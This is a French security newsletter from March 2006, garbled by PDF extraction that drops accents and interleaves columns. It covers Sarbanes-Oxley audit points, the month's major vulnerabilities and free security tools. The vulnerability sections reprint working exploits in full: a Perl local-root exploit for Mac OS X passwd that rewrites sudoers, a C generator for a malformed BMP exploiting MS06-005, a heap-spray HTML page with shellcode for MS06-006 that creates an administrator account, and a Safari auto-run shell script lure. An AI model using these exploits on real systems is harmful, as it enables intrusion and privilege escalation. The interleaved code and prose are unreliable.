Professional Documents
Culture Documents
MARS 2006
Lactu Scurit N1
Une newsletter pas comme les autres...
PLAN
Lactualit de la scurit est Jespre que cette newsletter
1 riche. Il devient mme impossible de vous apportera les rponses aux
POINT JURIDIQUE ne pas multiplier les sources din- questions que vous vous posez. Bien
Prsentation des diffrents formation et les interlocuteurs pour entendu, je vous invite nous faire
points auditer lors dune mise
essayer dy voir clair. Quant penser part de vos commentaires, et des
en conformit Sarbanes-Oxley.
que certains acteurs ont tout ga- ventuels points que vous souhaite-
gner entretenir cette confusion... riez voir abords, afin de combler
2
NOUVELLE TENDANCE Depuis 2002, nous avons dlib- vos attentes.
Le systme dexploitation Mac rment choisi dtre un cabinet diff- Je profite de cette tribune pour
OS X dApple connait une po- rent, anim par une volont mar- remercier mon quipe de consultants
pularit grandissante et int- que de dlivrer un service de qua- pour leur motivation, leur expertise
resse les pirates informatiques. lit, ractif, fiable et surtout transpa- et la rigueur dont ils font preuve
rent. quotidiennement pour vous satis-
3
Notre ractivit nous a dailleurs faire.
ATTAQUES ET ALERTES
MAJEURES permis de gagner la confiance de
Description et analyse des atta- nos clients, en nous concentrant sur A bientt.
ques et menaces les plus impor- la rsolution de leurs problmes,
tantes parues durant le mois de plutt que sur les dtails administra-
Fvrier. tifs qui agacent.
Plusieurs clients nous ont de-
4
mand de complter notre service de
VOLUTION NORMES ET
STANDARDS veille scurit quotidienne, par une
Le guide de dveloppement s- synthse au sein de laquelle nous
curis des applications et des pourrions aborder ce qui nous parait
services Web de lOWASP tente essentiel.
de normaliser la scurisation des Vous retrouverez donc chaque
applications Web.
mois les rubriques suivantes : Point
Juridique, Nouvelles Tendances,
5
OUTILS LIBRES Attaques et Alertes Majeures, Evo-
Dcouvrez et suivez les volu- lutions Normes et Standards, Outils
tions des outils libres les plus libres.
utiles et efficaces.
Pour le premier numro de
notre newsletter, nous avons dcid
daborder la loi Sarbanes-Oxley :
avez-vous dj essay de trouver sur
Marc Behar
Internet un modle de questionnaire
Sarbanes-Oxley ? trop peu dinfor-
mations sont disponibles...
1. POINT JURIDI-
QUE:
SARBANES-OXLEY
La gestion des mots de passe Utilisation des serveurs DHCP Plan de reprise en cas de dsastres
Un audit concerne plu- avec rservation dIP en fonction Cet aspect a pour objectif
sieurs critres: de ladresse MAC afin dinterdire dvaluer les capacits de
laccs aux machines trangres au
lentreprise faire face
rseau.
Le niveau de scurit des mots de Protection du rseau interne par 2 un incident grave.
passe. niveaux de pare-feux.
Contrle et journalisation des Sauvegarde des serveurs princi-
La vrification du changement des
accs Internet. paux.
mots de passe tous les six mois. Signature dune charte de bon Externalisation des supports de
Ltude des notes dlivres par le usage dInternet. sauvegarde.
Authentification des utilisateurs Rdaction dun document de
responsable scurit aux employs
pour accder Internet. procdure de restauration pour
sur la politique des choix de mots chaque serveur.
Rvocation des certificats lors du
de passe. dpart des collaborateurs.
Un exemple concret de test consiste- Filtrage des emails vis--vis des Applications ERP
rait valuer la scurit des mots de menaces connues: virus, chevaux La scurit des ERPs
passe de 30 utilisateurs, et identi- de Troie, etc. constitue un point cl de
fier la proportion de mots de passe
la loi Sarbanes-Oxley.
faibles. Gestion des antivirus et des correctifs
Effectuer un filtrage effi- Contrles stricts de laccs : attri-
Etude de rseau informatique cace sur les serveurs de bution de droits aux utilisateurs
La seconde partie con- mails afin dviter toute des diffrentes ressources.
cerne le rseau informati- propagation de vers et de Utilisation de mots de passe longs
que. Plusieurs points sont et une authentification tablie
fichiers malicieux sur le toutes les 15 minutes lorsque lap-
tudier: rseau internes. plication nest pas utilise.
Accessibilit des donnes seule-
Vrificationde lauthentification Analyse virale de tous les messages ment aux utilisateurs autoriss.
des accs VPN. qui transitent par le serveur SMTP.
un contrle des mises jour doit
tre effectu chaque mois par un
responsable informatique.
Les sauvegardes
Des mesures de sauvegardes continues.
2. NOUVELLE TENDANCE :
MAC OS X EST VULNRABLE
$fake_passwd="/tmp/xpasswd.$$";
Un programme malicieux visant la plate-forme Mac OS $passwd_pid=($$ + 1);
X a t publi le 28 Fvrier 2006. Ce programme permet $passwd_tempfile="/tmp/.pwtmp.$passwd_pid";
un utilisateur local dexcuter des commandes arbitrai- $sudoers="/etc/sudoers";
res dans le contexte du super-utilisateur root sur un
systme vulnrable. sub pexit{print("[!] @_.\n");exit(1);}
print("[*] /usr/bin/passwd[OSX]: local root exploit.\n");
Le problme rsulte dune erreur de conception de luti- print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/real-
litaire passwd du systme dApple. En effet, il est possi- halo)\n\n");
ble de passer au programme incrimin un fichier alatoire unlink($fake_passwd);
print("[*] making fake password file. ($fake_passwd)\n");
en paramtre sans que celui ci ne soit valid. open(FP,">$fake_passwd")||pexit("couldn't open/write to
Un utilisateur local malveillant devient donc en mesure $fake_passwd");
d'lever ses privilges en passant un fichier passwd judi- # uid must equal the current user.
cieusement conu au programme impact. print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid .
"::" .
Le programme expos ci-contre permet d'effectuer faci- getuid . ":" . getuid . "::/:/\n");
lement ces manipulations frauduleuses. close(FP);
print("[*] sym-linking $sudoers -> $passwd_tempfile.\n");
symlink($sudoers,$passwd_tempfile)||pexit("couldn't
link files.");
print("[*] running /usr/bin/passwd on $fake_passwd.\n");
print("[*] (use ANY password longer than 4 charac-
ters)\n\n");
system("/usr/bin/passwd -i file -l $fake_passwd \"ALL
ALL=(ALL) ALL #\"");
print("\n[*] running \"sudo sh\", use your REAL (user)
password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
# /bin/bash
while true; do
echo "Hallo Welt!"
done
3. ATTAQUES MAJEURES :
TOP 5 DU MOIS DE FVRIER
XMCO | Partners
La premire faille critique concerne le logiciel Windows Dans tous les cas, lintervention de lutilisateur est indis-
Media Player et est corrige avec lapplication du correctif pensable et lattaquant devra possder un serveur idoine
MS06-005. (SMTP, HTTP, FTP etc).
Microsoft corrige une faille de scurit de son lecteur Un programme malveillant est sorti quelques heures aprs
multimdia Windows Media Player. En effet, le lecteur la publication du correctif.
multimdia de Microsoft souffrait dun dbordement de Le code de cet exploit (voir page suivante) provoque un
tas survenant lors de la lecture de certains fichiers image dbordement de tampon et pourrait tre complt afin de
.bmp malforms. Cette erreur dimplmentation pou- permettre lexcution de code arbitraire (installation de
vait tre exploite par des attaquants distants afin dex- troyens, virus)
cuter des commandes arbitraires sur un systme vulnra-
ble.
#include <windows.h>
#include <stdio.h> bmp_iheader->biClrUsed = 0x00;
#define BITMAP_FILE_SIZE 0xA8D2 bmp_iheader->biClrImportant = 0x00;
#define BITMAP_FILE_NAME "crafted.bmp" memcpy(pszBuffer,bmp_fheader,sizeof(BMPFHEADER)
#pragma pack( push ) );
#pragma pack( 1 ) memcpy(pszBuffer+sizeof(BMPFHEADER),bmp_ihead
typedef struct _BitmapFileHeader { er,sizeof(BMPIHEADER));
WORD bfType; fwrite(pszBuffer, BITMAP_FILE_SIZE-1, 1,File);
DWORD bfSize; fwrite("\x00", 1,1, File); //Terminator
WORD bfReserved1; fclose(File);
WORD bfReserved2; printf("\n\n" BITMAP_FILE_NAME" has been created in
DWORD bfOffBits; the current directory.\n");
} BMPFHEADER; return 1;
typedef struct _BitmapInfoHeader{ }
DWORD biSize;
LONG biWidth;
LONG biHeight;
exploit MS06-005
WORD biPlanes;
WORD biBitCount; MS06-006
DWORD biCompression;
DWORD biSizeImage; Excution de code arbitraire
LONG biXPelsPerMeter; distance avec des balises EMBED
LONG biYPelsPerMeter;
DWORD biClrUsed;
malformes.
DWORD biClrImportant;
} BMPIHEADER; Microsoft a corrig une vulnrabilit qui permettait un
#pragma pack( pop ) attaquant distant dexcuter des commandes arbitraires
sur un systme vulnrable, voir de prendre le contrle
int main(void) total de la machine cible.
{
FILE *File; Le problme rsulte dune mauvaise gestion de balises
BMPFHEADER *bmp_fheader;
BMPIHEADER *bmp_iheader;
EMBED du plugin Windows Media Player. Les tags EM-
char *pszBuffer; BED sont des balises HTML qui permettent dinclure des
plug-ins et des lecteurs dans les pages web.
printf("\nWindows Media Player BMP Heap Overflow
(MS06-005)"); La vulnrabilit exploite se manifeste lorsquun lment
printf("\nBug discovered by eEye"); embed src excessivement long est insr dans une page
printf("\nExploit coded by ATmaCA"); HTML malicieuse. Lors du traitement de cette balise par
printf("\nWeb: http://www.spyinstructors.com && le plugin Windows Media Player, une erreur de type d-
http://www.atmacasoft.com"); bordement de tampon se produit.
printf("\nE-Mail: atmaca@icqmail.com"); Lattaquant peut ainsi excuter du code distance lorsque
printf("\nCredit to Kozan");
if ( (File = fopen(BITMAP_FILE_NAME,"w+b")) ==
la victime visite le site web pirate.
NULL ) {
printf("\n [E:] fopen()"); Seuls les navigateurs autres quInternet Explorer sont
exit(1); affects par cette vulnrabilit (Firefox, Opera,
} Netscape). Il faut donc que la victime utilise un de ces
bmp_fheader=(BMPFHEADER*)malloc(sizeof(BMPFHE navigateurs et que Windows Media Player soit install sur
ADER)); la machine cible.
bmp_iheader=(BMPIHEADER*)malloc(sizeof(BMPIHEA Il est important de noter que les consquences de latta-
DER)); que dpendent des droits de la victime.
pszBuffer = (char*)malloc(BITMAP_FILE_SIZE); Le pirate pourrait prendre le contrle total de la machine
memset(pszBuffer,0x41,BITMAP_FILE_SIZE);
bmp_fheader->bfType = 0x4D42; // "BM"
vulnrable si lutilisateur est authentifi en tant quadmi-
bmp_fheader->bfSize = BITMAP_FILE_SIZE; nistrateur.
bmp_fheader->bfReserved1 = 0x00; De plus, lintervention dun utilisateur est indispensable.
bmp_fheader->bfReserved2 = 0x00; Effectivement, lutilisateur cibl ne risque rien tant quil
bmp_fheader->bfOffBits = 0x00; //( sizeof(BMPFHEA- na pas visit le site web pirate.
DER) + sizeof(BMPIHEADER) );
bmp_iheader->biSize = 0x28; Ces programmes exploitent la faille MS06-006 corrige
bmp_iheader->biWidth = 0x91; rcemment par Microsoft. Un utilisateur distant est en
bmp_iheader->biHeight = 0x63; mesure d'utiliser ces programmes afin d'excuter des
bmp_iheader->biPlanes = 0x01; commandes arbitraires sur un systme qui demeure non
bmp_iheader->biBitCount = 0x18;
bmp_iheader->biCompression = 0x00;
corrige.
bmp_iheader->biSizeImage = 0xA89C;
bmp_iheader->biXPelsPerMeter = 0x00;
bmp_iheader->biYPelsPerMeter = 0x00;
<HTML>
<HEAD>
Le premier programme se prsente sous forme d'une page <TITLE>WMP Plugin EMBED Exploit</
HTML contenant des balises <EMBED> judicieusement TITLE>
malformes. Ce programme a t test avec succs sur <SCRIPT>
une machine Windows XP SP2 implmentant Windows var spray =
Media Player 10 et Firefox 1.5.0.1. Cet exploit permet de unescape("%u4141%u4141%u4141%u4141%u4
se loguer en local en tant quadministrateur avec le nom 141%u4141%u4141%u4141");
dutilisateur wmp0wn3d et le mode de passe pass- do {
word. spray += spray;
Vous trouverez le code de cette page la fin de cette } while (spray.length < 0x1000000);
description.
spray += unescape(
Le second programme est un module du produit Metas- "%uc933%ue983%ud9c9%ud9ee%u2474%u5bf4
ploit. Il permet exploiter la faille sur des machines vuln- %u7381%u9713"+
rables implmentant la version 9 du produit incrimine. "%u798c%u839b%ufceb%uf4e2%u646b%u9b3d
%u8c97%udef2"+
"%u07ab%u9e05%u8def%u1096%u94d8%uc4f2
%u8db7%ud292"+
"%ub81c%u9af2%ubd79%u02b9%u083b%uefb9
%u4d90%u96b3"+
"%u4e96%u6f92%ud8ac%u9f5d%u69e2%uc4f2
%u8db3%ufd92"+
"%u801c%u1032%u90c8%u7078%u901c%u9af2
%u057c%ubf25"+
"%u4f93%u5b48%u07f3%uab39%u4c12%u9701
%ucc1c%u1075"+
"%u90e7%u10d4%u84ff%u9292%u0c1c%u9bc9
%u8c97%uf3f2"+
"%ud3ab%u6d48%udaf7%u63f0%u4c14%ucb02
%u7cff%u9ff3"+
"%ue4c8%u65e1%u821d%u642e%uef70%uff14
%ue9b9%ufe01"+
"%ua3b7%ubb1a%ue9f9%ubb0d%uffe2%ue91c
%ufbb7%ueb14"+
"%ufba7%ua817%uacf3%ufa09%uffe4%uf40e
%ue8e5%ub459"+
"%uc8d6%ubb3d%uaab1%uf559%uf8f2%uf759
%ueff8%uf718"+
"%ufef0%uee16%uace7%uff38%ue5fa%uf217
%uf8e4%ufa0b"+
"%ue3e3%ue80b%ufbb7%ueb14%ufba7%ua817
%uacf3%uda56"+
"%uc8d3%u9b79"
);
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="<2038 fois ->
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJ
JJJKKKKLLLLAAANNNNOOOO
AAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYY
YYZZZZ0000111122223333444455556666
777788889999.wmv"></EMBED>
</BODY>
</HTML>
exploit MS06-006
MS06-004
Correctif cumulatif critique pour Erreur de conception de Safari
Internet Explorer sur Windows Excution automatique de script
2000. shell sur les systmes Mac OS X.
La seconde faille critique de Microsoft pour le mois de
Un exploit paru le 21 fvrier 2006 permettait un atta-
fvrier 2006 est un correctif cumulatif pour Internet Ex-
quant distant d'excuter des scripts Shell sur un systme
plorer, c'est dire que ce correctif corrige galement les
Mac OS X vulnrable de manire automatique.
failles publies depuis le MS04-004 et le MS04-038.
Le problme rsulte d'une faille de conception du navi-
Ce correctif cible uniquement les versions 5.1 d'Internet
gateur Internet Safari. En effet, le produit dApple d-
Explorer sur les machines Windows 2000 SP4 et corrige
compresse automatiquement les archives zip et lance le
une nouvelle faille lie aux fichiers image .wmf au sein
programme correspondant au fichier dcompress. Dans
desquels il est possible de cacher un programme mali-
le cas o le fichier dcompress est un script Shell celui-ci
cieux.
est excut automatiquement dans un terminal.
Un attaquant distant peut inciter une victime tlchar-
Le problme est d la gestion des images WMF (Win-
ger une archive contenant un script Shell judicieusement
dows Metafile). Lors de lexcution de fichiers malforms,
forg afin d'excuter automatiquement des commandes
Internet Explorer peut corrompre la mmoire systme ce
arbitraires sur un systme vulnrable.
qui peut tre alors exploit par un attaquant afin dex-
cuter du code sur le poste victime.
En dautres termes, le pirate va crer un script dextension
.sh, contenant le code malicieux, qui sera excut sur
Pour pouvoir raliser une telle attaque, lutilisateur mal-
la machine cible.
intentionn doit inciter un utilisateur visiter un site web
La preuve de concept utilise une simple boucle qui affiche
malicieux afin de lancer lexcution dun fichier MF mal-
form. indfiniment une chane de caractres. La capture dcran
Il peut galement envoyer ce fichier par pice jointe dans que vous trouverez la fin de cette description corres-
pond lutilisation quelque peu modifie de la preuve de
un courriel.
concept et permet de lancer la calculatrice. Vous pouvez
Un point important est prciser : le fait de filtrer les facilement imaginer les possibilits dutilisation de cet
fichiers comportant lextension .wmf ne suffit pas. exploit.
Windows ne dtermine pas le type de fichier en fonction
de son extension, il reconnat le type grce au magic- while true; do
number du fichier. echo " Hallo Welt!"
De plus, lintervention dun utilisateur est indispensable. done
Actuellement, aucun programme malveillant qui exploite MAC OS X - preuve de concept Safari
cette vulnrabilit nest disponible sur Internet.
Ce script Shell sera renomm en un type excutable di-
Plusieurs rgressions fonctionnelles sont prvoir. Ces rectement avec Safari (fichier vido par exemple) et int-
dernires sont dues au fait que le correctif ajoute les an- grer dans une archive dextension .zip.
ciens MS04-004 et MS04-038 qui contenaient lesdites Le pirate va inciter sa victime visiter un lien comme
rgressions : celui-ci:
http://www.sitepirate.com/funny.mov.zip
KB884487 [1] : Lecteur "chapitre par chapitre" impossi-
ble avec le DVD Haute-Dfinition et Windows Media Le navigateur va donc extraire directement le fichier
P l a y e r . contenu dans larchive car lextension ne comporte prio-
KB909889 [2] : Certains contrles ActiveX peuvent ne ri aucune menace potentielle (.mov).
pas se charger correctement.
KB896688 [3] : Rgression due a l'ajout de MS05-052.
Certains ActiveX "maison" peuvent ne plus se charger.
Pour corriger cela, il faut ajouter le site dans les sites de
confiance et autoriser les ActiveX non signs.
Ce dernier ne reconnatra pas le fichier (qui nest pas rellement un fichier vido) et donc lancera lexcution du script
Shell.
4. EVOLUTION
DE NORMES :
OWASP
XMCO | Partners
5. OUTILS LIBRES :
FOCUS SUR 5 PRODUITS LIBRES
XMCO |Partners
Debian
Distribution Linux
Version actuelle version stable 3.1 (20 dcembre 2005) nom de code Sarge version 3.1r1
Utilit
Tlchargement http://www.debian.org/CD/netinst/
Scurit de loutils Du fait des nombreux paquets proposs par la distribution, de nombreuses
vulnrabilits sont publies chaque semaine.
Lavantage majeur de Debian par rapport aux autres distributions est sa
facult pouvoir tlcharger les nouvelles versions des paquets avec une
simple commande: apt-get <nom du paquet>.
Snort
Dispositif de dtection dintrusion
Version actuelle Snort 1.8.1
Utilit
Tlchargement http://www.snort.org/dl/
Scurit de loutils Quelques failles ont t reportes, cependant, la ractivit des dveloppeurs
est bonne.
La liste des vulnrabilits de Snort est disponible ladresse ci-dessous:
http://secunia.com/search/?search=snort
MySQL
SGBD
Version actuelle MySQL 5.0
Utilit
Type SGBD
Description Mysql est un serveur de base de donnes relationnelles SQL rapide qui
permet de grer des bases de donnes de plusieurs traoctets et offre dex-
cellentes performances en termes de monte en charges.
Robuste et Multi-Utilisateurs, cet outil profite de son importance au sein de
la communaut du logiciel libre pour senrichir et samliorer constamment.
Mysql fonctionne sur de nombreuses plateformes tels que AIX, BSDi,
FreeBSD, HP-UX, Linux, Mac OS X, NetBSD, OpenBSD, OS/2 Warp,
SGI Irix, Solaris, SunOS, SCO OpenServer, SCO UnixWare, Tru64 Unix,
Windows 95, 98, NT, 2000 et XP.
Plusieurs outils graphiques peuvent tre utiliss avec MySQL:MySQL
Workbench, MySQL Query Browser, MySQL Administrator (voir capture),
MySQL Migration Toolkit.
Capture dcran
Tlchargement http://www-fr.mysql.com/products/database/mysql/
Scurit de loutils Quelques failles ont t reportes, cependant des mises jour sont propo-
ses rapidement.
La liste des vulnrabilits MySQL est disponible ladresse ci-dessous:
http://secunia.com/search/?search=Mysql
Apache
Serveur HTTP
Version actuelle Apache 2.2.0
Type Serveur HTTP
Utilit
Description Apache est le serveur web le plus rpandu sur Internet, il rivalise directe-
ment son camarade IIS de Microsoft.
Ce projet open-source a pour but de proposer aux internautes un serveur
http fiable, scuris et efficace. Selon ltude mene par Netcraft Web Ser-
ver Survey, prs de 70% des sites Internet utilisent cet outil.
Dvelopp pour le monde UNIX, Apache a rapidement t port sous
Windows.
Capture dcran
Tlchargement http://www.apachefrance.com/Telechargement/4/
Scurit de loutils Quelques failles ont t reportes, cependant des mises jour sont propo-
ses rapidement.
La liste des vulnrabilits Apache est disponible ladresse ci-dessous:
http://secunia.com/search/?search=Apache
Nmap
Scanner de ports
Version actuelle Nmap 4.01
Utilit
Tlchargement http://www.insecure.org/nmap/download.html
Scurit de loutils Peu de failles ont t dcouvertes, lexploitation des failles dun scanner na
que trs peu dintrt puisque son utilisation est ponctuelle.
La liste des vulnrabilits Nmap est disponible ladresse ci-dessous:
http://secunia.com/search/?search=nmap